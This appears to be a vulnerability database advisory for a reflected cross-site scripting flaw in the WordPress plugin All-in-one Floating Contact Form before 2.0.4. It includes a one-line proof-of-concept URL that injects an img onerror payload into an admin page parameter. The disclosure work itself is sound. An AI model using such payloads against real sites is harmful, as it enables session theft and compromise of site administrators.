Lucene search

K
wpvulndbKrzysztof ZającWPVDB-ID:37665EE1-C57F-4445-9596-DF4F7D72C8CD
HistoryJan 10, 2022 - 12:00 a.m.

All-in-one Floating Contact Form < 2.0.4 - Authenticated Reflected Cross-Site Scripting (XSS)

2022-01-1000:00:00
Krzysztof Zając
wpscan.com
5
plugin
reflected xss
admin page

EPSS

0.001

Percentile

50.4%

The plugin was vulnerable to reflected XSS on the my-sticky-elements-leads admin page.

PoC

http://127.0.0.1:8001/wp-admin/admin.php?page=my-sticky-elements-leads&amp;search-contact;=xxxx"><img+src+onerror%3Dalert(1)+x

EPSS

0.001

Percentile

50.4%

Related for WPVDB-ID:37665EE1-C57F-4445-9596-DF4F7D72C8CD